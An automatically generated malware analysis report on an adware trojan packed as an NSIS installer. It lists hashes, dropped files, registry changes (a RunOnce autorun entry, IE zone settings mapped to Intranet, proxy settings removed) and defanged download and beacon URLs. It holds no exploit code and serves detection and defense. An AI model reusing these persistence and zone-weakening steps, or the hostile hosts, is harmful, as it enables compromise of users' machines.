Trojan.Generic.11726935_42c7df5771

by malwarelabrobot on April 30th, 2016 in Malware Descriptions.

not-a-virus:AdWare.Win32.ConvertAd.ajzv (Kaspersky), Trojan.Generic.11726935 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 42c7df5771aed3248e8f04ac2affda17
SHA1: 1d7f06dbf7acf03b9be4331d4db120c222c8f374
SHA256: 64ecd33aaed204813ae3748835013aff5a9737a4f4b32072becf631f24f4d783
SSDeep: 6144:uzfj/cK4AtXPDtUoaZDM16 tBdiTqwpnGrJ0X:0/N1ZowZtBATXnOW
Size: 308560 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nsoA.tmp:240
Full_Setup.exe:1912
%original file name%.exe:856
nsg16.tmp:1164

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nsoA.tmp:240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1] (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\vos_n[1].htm (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoF.tmp (11755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv14.tmp (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp\inetc.dll (784 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsb19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu10.tmp (0 bytes)

The process Full_Setup.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn7.tmp (6720 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjD.tmp (0 bytes)

The process %original file name%.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\t1.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JST0V6P\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\IpConfig.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\r[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Uninstall.exe (2967 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\CAW1QV4X.htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (9120 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw18.tmp (0 bytes)

The process nsg16.tmp:1164 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx1A.tmp (0 bytes)

Registry activity

The process nsoA.tmp:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 09 52 BF 70 EC 4B 64 A2 6F 47 D8 47 2C 99 E2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings to map all local web-nodes with no dots that are not assigned to any other zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Full_Setup.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 A0 EE 3E EA FF EC ED 9E E5 55 43 99 D5 13 B5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings to map all local web-nodes with no dots that are not assigned to any other zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayName" = "Installer Package"
"Publisher" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Resume]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\InstallW\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 81 A8 B8 DE 6F 45 39 9D 06 7C F8 B7 83 15 F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"

The Trojan modifies IE security-zone settings to map all local web-nodes with no dots that are not assigned to any other zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsg16.tmp:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 1B 75 21 A0 FB C6 32 EF B8 1E 34 62 03 0E E5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
fb33b9c5234606a7dbf9247e01e8f86a c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe
ebce0562cbf6067824e005841744d1cf c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Uninstall.exe
2a5f246b97d00f77b78d15f72923839b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe
a3ed6f7ea493b9644125d494fbf9a1e6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\IpConfig.dll
8531346d16fa5d4768f6530d2eb2b65c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\WmiInspector.dll
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\inetc.dll
058ba8a0916d957d3b91d08ea2e876e2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd3.tmp\t1.dll
bb25f5faf1d2329cbad8b763695bc518 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg16.tmp
8501f079ef3fc63721d0164b8a34b4a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoA.tmp
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu10.tmp\inetc.dll
bb25f5faf1d2329cbad8b763695bc518 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\1TLH01PG\tJEcW[1]
2a5f246b97d00f77b78d15f72923839b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\F89OK2Q0\Validate[1].exe
fb33b9c5234606a7dbf9247e01e8f86a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\H9EA3RRE\CAEJCTMN.htm

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: setup
Product Version: 1.0.0.0
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23462 23552 4.51398 9d64b6ac6eb1aa41e38f6cc8798b652e
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 3774424 1024 3.26654 af685ae5a632e08acd6c90a62cdfc3bb
.ndata 3813376 73728 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 3887104 17192 17408 4.11146 9744c9d8118bab5893d7e4c284c0adee

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 843
9e690e54fcaaec9e5ab149fdc7b39849
358c5cfa475c092625893377a53bb4b4
65a8ed347f955dc5b0cc72cd41edbda0
0474bc4cdbf6ebb28c41f29f08aff838
56f0773f477f9cd0340c0be299733fec
7d55f8587b19fc4f736b5142fafbf7d4
5ce92582e1a08a0ff321f9340e1050e4
94eefef5bbfc51c6b58cdd78d4d23a60
7360f94503b83a0a7583e4dd3b1a5da7
cead8cb9974398d8a97f11ecadffa99d
5c970638dc1d11b78456803966700f51
32781edd5bd0b472be7f9f3e7b066c17
680a542ac63edbf9b931b5db42883fb1
465c622d673d1c58e5bf257e4474113d
86772153d906b98a65d9a64a910117f6
13ddb0d6ec6ed13888cf211634187f29
00a69d79ba73b543914470b9087a11e8
4f2b2e2301f662eb0c2ef92d267711d2
8bf2fb9cdba8e11b9c67885900eb82d6
67df116b398f91b64eeab7c6fc280bb7
6f377cd73cbf924b48ba52c335a47c78
d4db355aaebca07562d248ae8b8c5635
2ef26b587dab0f74352943849596f24e
150711d4ed93d249436d8e851a9698e7
38aef307050ce93a00fd647bc1b34ef0

URLs

URL IP
hxxp://data.biphysics.com/r?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://data.biphysics.com/r?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://www.download-servers.com/vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=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 50.7.86.58
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ 204.236.233.80
hxxp://www.download-servers.com/SysInfo/Validate.exe 50.7.86.58
hxxp://sstatic1.histats.com/0.gif?2601800&101 208.43.241.179
hxxp://www.download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 50.7.86.58
hxxp://sstatic1.histats.com/0.gif?2601768&101 208.43.241.179
hxxp://www.download-servers.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 50.7.86.58
hxxp://www.download-servers.com/SysInfo/tem.php?sid=83837567483 50.7.86.58
